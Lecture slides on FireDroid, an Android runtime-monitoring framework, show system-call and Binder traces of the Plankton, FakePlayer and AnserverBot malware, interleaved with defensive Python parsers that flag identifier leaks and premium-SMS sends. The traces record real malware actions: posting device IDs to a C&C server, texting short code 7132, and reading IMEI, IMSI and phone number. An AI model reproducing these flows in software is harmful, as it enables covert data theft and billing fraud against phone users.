
1 Monitoring Malware at Runtime

2 From Last Lecture
- Malware authors use advanced coding techniques to avoid detection
- AnserverBot is a very sophisticated piece of software
- AVs are lagging behind
  - Low detection rate on new malware
  - Large exposure window before the signature DB is updated
  - Main issue: they rely only on the app signature
- What we need is a tool to detect runtime behaviour

3 FireDroid
- Our group is developing a new Android security framework
- FireDroid is capable of monitoring app execution and enforcing security policies
- No need to modify the Android OS code! The only modification is to insert one line in the init.rc file
- FireDroid enables us to monitor the system calls executed by apps (and malware)

4 System Call Interposition
- System calls are used by apps to interact with the kernel
- By intercepting sensitive system calls we can enforce security policies to better protect Android
- We can also use FireDroid to collect information about the system calls executed by apps

5 Malware Genome Project
- Collection of 2GB of malware samples
- We have executed some of these samples within the FireDroid sandbox
- In the following, we are going to see some more details
- After the semester break, Daniel will provide a live demo

6 Plankton
- Communicates with a C&C server
- Sends some info when the installation is complete, together with some settings of the phone

7 Opening a socket
  [1743] syscall=socket(281) domain:PF_INET6 type:SOCK_STREAM protocol:IPPROTO_IP
  ******************************
  [1743] syscall=bind(282) socket: socket:[26088] sa_family = AF_INET6 port = 0 address = ::
  ******************************
  [1743] syscall=connect(283) socket: socket:[26088] sa_family = AF_INET6 port = 80 address = 208.93.141.140
  ******************************

8 Establishing a connection
  ******************************
  [1743] syscall=sendto(290) socket: socket:[26088] Connected Socket! data len: 168 data:
  POST /ProtocolGW/installation HTTP/1.1
  Content-Length: 1426
  Content-Type: application/x-www-form-urlencoded
  Host: www.searchwebmobile.com
  Connection: Keep-Alive
  ******************************
  [1743] syscall=sendto(290) socket: socket:[26088] Connected Socket! data len: 1024 data:
  action=get&applicationId=325842969&developerId=752469853&deviceId=000000000000000&currentVersion=-1&permissions=android…
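The socket trace on slides 7 and 8 is exactly the input a system-call interposition layer (slide 4) has to reason about: which process opened which socket, where it connected, and what it then sent. The following is an added example, not code from the slides or from FireDroid. It parses trace lines in the format shown above (with the underscores in names like PF_INET6 and sa_family restored), ties each sendto back to its connect() peer via the socket inode, and applies a small policy: connect() is denied unless the peer is allow-listed, and a sendto whose form body carries device-identifier fields is flagged. The regexes, the Event and Verdict types, the allow-list rule, the IDENTIFIER_KEYS list and the sample trace (built from the slide lines, cut where the slide itself is truncated) are this example's assumptions.

```python
"""Parse FireDroid-style socket syscall trace lines and apply an interposition policy.

Added example, not FireDroid code: the line format follows the slides (underscores in
PF_INET6, sa_family etc. restored); regexes, Event/Verdict, the allow-list rule and
IDENTIFIER_KEYS are this example's assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import parse_qs

# One event per trace line; the "*****" separator lines carry no data.
EVENT_RE = re.compile(r"^\[\*?(?P<pid>\d+)\]\s*syscall=(?P<name>\w+)\((?P<nr>\d+)\)\s*(?P<rest>.*)$")
SOCK_RE = re.compile(r"socket:\s*socket:\[(?P<ino>\d+)\]")
ADDR_RE = re.compile(r"port = (?P<port>\d+) address = (?P<addr>\S+)")
DATA_RE = re.compile(r"data len: (?P<len>\d+) data: (?P<data>.*)$")
HTTP_RE = re.compile(r"^(?P<method>GET|POST|PUT|HEAD) (?P<path>\S+) HTTP/1\.[01]")
HOST_RE = re.compile(r"Host: (?P<host>\S+)")
IDENTIFIER_KEYS = {"deviceId", "imei", "imsi", "phoneNumber"}  # constructed list of identifier form keys

# Constructed sample: the socket/bind/connect/sendto events from slides 7 and 8, one per
# line; the form body stops at currentVersion, where the slide itself is truncated.
SAMPLE_TRACE = """\
[1743] syscall=socket(281) domain:PF_INET6 type:SOCK_STREAM protocol:IPPROTO_IP
******************************
[1743] syscall=bind(282) socket: socket:[26088] sa_family = AF_INET6 port = 0 address = ::
******************************
[1743] syscall=connect(283) socket: socket:[26088] sa_family = AF_INET6 port = 80 address = 208.93.141.140
[1743] syscall=sendto(290) socket: socket:[26088] Connected Socket! data len: 168 data: POST /ProtocolGW/installation HTTP/1.1 Content-Length: 1426 Content-Type: application/x-www-form-urlencoded Host: www.searchwebmobile.com Connection: Keep-Alive
[1743] syscall=sendto(290) socket: socket:[26088] Connected Socket! data len: 1024 data: action=get&applicationId=325842969&developerId=752469853&deviceId=000000000000000&currentVersion=-1
"""

@dataclass
class Event:
    pid: int
    name: str                  # syscall name, e.g. "connect"
    sock: str | None = None    # inode from "socket:[26088]", ties sendto back to connect
    port: int | None = None
    addr: str | None = None
    data: str | None = None    # payload text logged for sendto

@dataclass
class Verdict:
    pid: int
    syscall: str
    decision: str   # "allow", "deny" or "flag"
    reason: str

def parse_trace(text: str) -> list[Event]:
    """Turn trace lines into Event records, skipping separators."""
    events: list[Event] = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ev, rest = Event(int(m.group("pid")), m.group("name")), m.group("rest")
        if s := SOCK_RE.search(rest):
            ev.sock = s.group("ino")
        if a := ADDR_RE.search(rest):
            ev.port, ev.addr = int(a.group("port")), a.group("addr")
        if d := DATA_RE.search(rest):
            ev.data = d.group("data")
        events.append(ev)
    return events

def http_request(payload: str) -> tuple[str, str, str | None] | None:
    """(method, path, Host header) when the payload starts with an HTTP request line."""
    m = HTTP_RE.match(payload)
    if not m:
        return None
    h = HOST_RE.search(payload)
    return m.group("method"), m.group("path"), h.group("host") if h else None

def leaked_identifiers(payload: str) -> set[str]:
    """Identifier keys present in a form-encoded payload (empty for non-form data)."""
    return {k for k in parse_qs(payload, keep_blank_values=True) if k in IDENTIFIER_KEYS}

def apply_policy(events: list[Event], allowed_hosts: set[str]) -> list[Verdict]:
    """connect() is allowed only to allow-listed peers; sendto() is flagged when its body
    carries identifier fields. The socket inode maps each sendto to its connect() peer."""
    peers: dict[str, tuple[str, int | None]] = {}
    verdicts: list[Verdict] = []
    for ev in events:
        if ev.name == "connect" and ev.sock and ev.addr:
            peers[ev.sock] = (ev.addr, ev.port)
            decision = "allow" if ev.addr in allowed_hosts else "deny"
            verdicts.append(Verdict(ev.pid, ev.name, decision, f"peer {ev.addr}:{ev.port}"))
        elif ev.name == "sendto" and ev.data is not None:
            peer = peers.get(ev.sock or "")
            dest = f"{peer[0]}:{peer[1]}" if peer else "unknown peer"
            if req := http_request(ev.data):
                dest += f" ({req[0]} {req[1]} Host={req[2]})"
            leaked = leaked_identifiers(ev.data)
            if leaked:
                verdicts.append(Verdict(ev.pid, ev.name, "flag", f"identifiers {sorted(leaked)} sent to {dest}"))
            else:
                verdicts.append(Verdict(ev.pid, ev.name, "allow", f"payload to {dest}"))
    return verdicts
```

Running `apply_policy(parse_trace(SAMPLE_TRACE), set())` yields three verdicts: deny for the connect to 208.93.141.140:80, allow for the first sendto (HTTP headers only, attributed to www.searchwebmobile.com), and flag for the second, whose body carries deviceId. In an interposition layer the deny would be returned to the app before the kernel runs connect(); here it is only recorded, which is the monitoring mode slide 4 describes.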

9 FakePlayer
- Its main activity is to send SMS
- It gets the handle for the SMS service from the Service Manager
- Then it sends SMS to a premium number (7132) with different subscription codes

10 Sending SMS
  [*1905]ioctl on /dev/binder with BINDER_WRITE_READ cmd:BC_TRANSACTION:
    target name = android.os.IServiceManager target = 0x0
    code = SVC_MGR_GET_SERVICE service name = isms data size = 80
  ******************************
  [*1905]ioctl on /dev/binder with BINDER_WRITE_READ cmd:BC_TRANSACTION:
    target name = com.android.internal.telephony.ISms target = 0x9
    code = 5 (sendText) data size = 128
    Destination: 7132 SMS Body: 849321

11 AnserverBot
- Retrieves information from the Telephony services:
  - Telephone number
  - International Mobile Station Equipment Identity (IMEI)
  - International Mobile Subscriber Identity (IMSI)
- This info is quite sensitive because it specifically points at YOU!

12 Getting the PhoneSubInfo Service
  [*2071]ioctl on /dev/binder with BINDER_WRITE_READ cmd:BC_TRANSACTION:
    target name = android.os.IServiceManager target = 0x0
    code = SVC_MGR_GET_SERVICE service name = iphonesubinfo
  ******************************
  [*2071]ioctl on /dev/binder with BINDER_WRITE_READ cmd:BC_TRANSACTION:
    target name = com.android.internal.telephony.IPhoneSubInfo target = 0xe
    code = 5 data size = 100
    data in text format: code 5: getLineNumber: Retrieves the phone number string for line 1

13 Getting More Info
  ******************************
  … code 1: getDeviceId: Retrieves the unique device ID, e.g., IMEI for GSM phones.
  ******************************
  … code 4: getIccSerialNumber: Retrieves the serial number of the ICC, if applicable.
  ******************************
  … code 2: getDeviceSvn: Retrieves the software version number for the device, e.g., IMEI/SV for GSM phones.
  ******************************
  … code 3: getSubscriberId: Retrieves the unique subscriber ID, e.g., IMSI for GSM phones.
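Slides 10, 12 and 13 show the other half of what an interposition tool sees on Android: Binder transactions, where the interesting information is not the ioctl itself but the target interface, the transaction code and the marshalled arguments. The following is an added example, not code from the slides or from FireDroid. It decodes trace lines in the format shown on those slides and turns them into findings: service look-ups through the Service Manager, an SMS sent via ISms (tagged as a short code when the destination is a short all-digit number, as 7132 is), and PhoneSubInfo getters that read device identifiers. The regexes, the Finding type, the short-code threshold and the CODE_TABLES mapping are this example's assumptions; the code-to-method mapping is taken from the slides' trace and holds only for the Android build that was traced, since AIDL transaction codes follow method order and differ between releases. The sample trace is constructed from the slide lines plus one code 1 (getDeviceId) request named on slide 13.

```python
"""Decode FireDroid-style binder ioctl trace lines into security findings.

Added example, not FireDroid code, modelled on the binder traces of slides 10, 12 and
13; the regexes, Finding, the short-code heuristic and CODE_TABLES are this example's
assumptions. The transaction codes are the ones printed in the slides' trace and hold
only for the Android build that was traced: AIDL codes follow method order and differ
between releases, so a real tool resolves them per target build.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

BINDER_RE = re.compile(
    r"^\[\*?(?P<pid>\d+)\]\s*ioctl on /dev/binder with BINDER_WRITE_READ cmd:(?P<cmd>\w+): "
    r"target name = (?P<iface>\S+) target = (?P<handle>0x[0-9a-fA-F]+) code = (?P<code>\S+)(?P<rest>.*)$"
)
SERVICE_RE = re.compile(r"service name = (?P<svc>\S+)")
DEST_RE = re.compile(r"Destination: (?P<dest>\S+)")
BODY_RE = re.compile(r"SMS Body: (?P<body>.*)$")

# Transaction code -> method name, as printed on the slides for this trace.
CODE_TABLES = {
    "com.android.internal.telephony.ISms": {5: "sendText"},
    "com.android.internal.telephony.IPhoneSubInfo": {
        1: "getDeviceId",         # IMEI on GSM phones
        2: "getDeviceSvn",        # IMEI/SV
        3: "getSubscriberId",     # IMSI
        4: "getIccSerialNumber",  # ICC serial number
        5: "getLineNumber",       # phone number of line 1
    },
}
IDENTIFIER_METHODS = {"getDeviceId", "getSubscriberId", "getIccSerialNumber", "getLineNumber"}
SHORT_CODE_MAX_DIGITS = 6  # heuristic: all-digit destinations this short count as short codes (assumption)

# Constructed sample: the FakePlayer (pid 1905) and AnserverBot (pid 2071) transactions
# from the slides, one per line, plus a code 1 (getDeviceId) request named on slide 13.
SAMPLE_TRACE = """\
[*1905]ioctl on /dev/binder with BINDER_WRITE_READ cmd:BC_TRANSACTION: target name = android.os.IServiceManager target = 0x0 code = SVC_MGR_GET_SERVICE service name = isms data size = 80
******************************
[*1905]ioctl on /dev/binder with BINDER_WRITE_READ cmd:BC_TRANSACTION: target name = com.android.internal.telephony.ISms target = 0x9 code = 5 (sendText) data size = 128 Destination: 7132 SMS Body: 849321
******************************
[*2071]ioctl on /dev/binder with BINDER_WRITE_READ cmd:BC_TRANSACTION: target name = android.os.IServiceManager target = 0x0 code = SVC_MGR_GET_SERVICE service name = iphonesubinfo
******************************
[*2071]ioctl on /dev/binder with BINDER_WRITE_READ cmd:BC_TRANSACTION: target name = com.android.internal.telephony.IPhoneSubInfo target = 0xe code = 5 data size = 100
******************************
[*2071]ioctl on /dev/binder with BINDER_WRITE_READ cmd:BC_TRANSACTION: target name = com.android.internal.telephony.IPhoneSubInfo target = 0xe code = 1 data size = 100
"""

@dataclass
class Finding:
    pid: int
    kind: str    # "service_lookup", "sms_send", "identifier_read" or "other_transaction"
    detail: str

def is_short_code(number: str) -> bool:
    """True for all-digit destinations of at most SHORT_CODE_MAX_DIGITS digits (e.g. 7132)."""
    return number.isdigit() and len(number) <= SHORT_CODE_MAX_DIGITS

def analyze_binder(text: str) -> list[Finding]:
    """Classify each BC_TRANSACTION line by target interface and transaction code."""
    findings: list[Finding] = []
    for line in text.splitlines():
        m = BINDER_RE.match(line.strip())
        if not m:
            continue  # separator or a line we do not decode
        pid, iface, code, rest = int(m.group("pid")), m.group("iface"), m.group("code"), m.group("rest")
        if code == "SVC_MGR_GET_SERVICE":
            svc = SERVICE_RE.search(rest)
            findings.append(Finding(pid, "service_lookup", svc.group("svc") if svc else "?"))
            continue
        method = CODE_TABLES.get(iface, {}).get(int(code)) if code.isdigit() else None
        if method == "sendText":
            dest = DEST_RE.search(rest)
            body = BODY_RE.search(rest)
            number = dest.group("dest") if dest else "?"
            body_text = body.group("body") if body else ""
            tag = "short code" if is_short_code(number) else "number"
            findings.append(Finding(pid, "sms_send", f"sendText to {tag} {number}, body={body_text!r}"))
        elif method in IDENTIFIER_METHODS:
            findings.append(Finding(pid, "identifier_read", f"{method} via {iface}"))
        else:
            findings.append(Finding(pid, "other_transaction", f"{iface} code {code}"))
    return findings

def identifier_methods_read(findings: list[Finding]) -> set[str]:
    """The PhoneSubInfo getters a trace called, i.e. which identifiers the app collected."""
    return {f.detail.split(" via ")[0] for f in findings if f.kind == "identifier_read"}

if __name__ == "__main__":
    for f in analyze_binder(SAMPLE_TRACE):
        print(f"[{f.pid}] {f.kind:18s} {f.detail}")
```

The service_lookup findings matter on their own: an app that resolves isms or iphonesubinfo through the Service Manager has declared its intent before any SMS leaves the device, which is the point at which a policy such as "no sendText to short codes" can still be enforced. Pairing the two pids also shows why the interface name is needed and not just the code: code 5 is sendText on ISms but getLineNumber on IPhoneSubInfo.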

14 AnserverBot Fetching from Baidu
  ******************************
  [1639] syscall=connect(283) socket: socket:[57270] sa_family = AF_INET6 port = 80 address = 220.181.111.147
  ******************************
  [1639] syscall=sendto(290) socket: socket:[57270] Connected Socket! data len: 153 data:
  GET / HTTP/1.1
  User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.0.4; sdk Build/MR1)^M
  Host: www.baidu.com
  Connection: Keep-Alive
  Accept-Encoding: gzip

15 AnserverBot Fetching from Baidu
  [1639] syscall=recvfrom(292) socket: socket:[57270] Connected Socket! data len: 128 data:
  HTTP/1.1 200 OK^M
  Set-Cookie: BAIDUID=127C8FA29422CAB3BA61707A4969F5DB:FG=1; max-age=31536000; expires=Tue, 29-Oct-13 01:17:10 GM
  ******************************
  [1639] syscall=recvfrom(292) :00:00 GMT; path=/; domain=.baidu.com^M
  P3P: CP='' OTI DSP COR IVA OUR IND COM ``^M
  Cache-Control: no-cache^M
  Content-type: text/html
  ******************************

16 Questions?
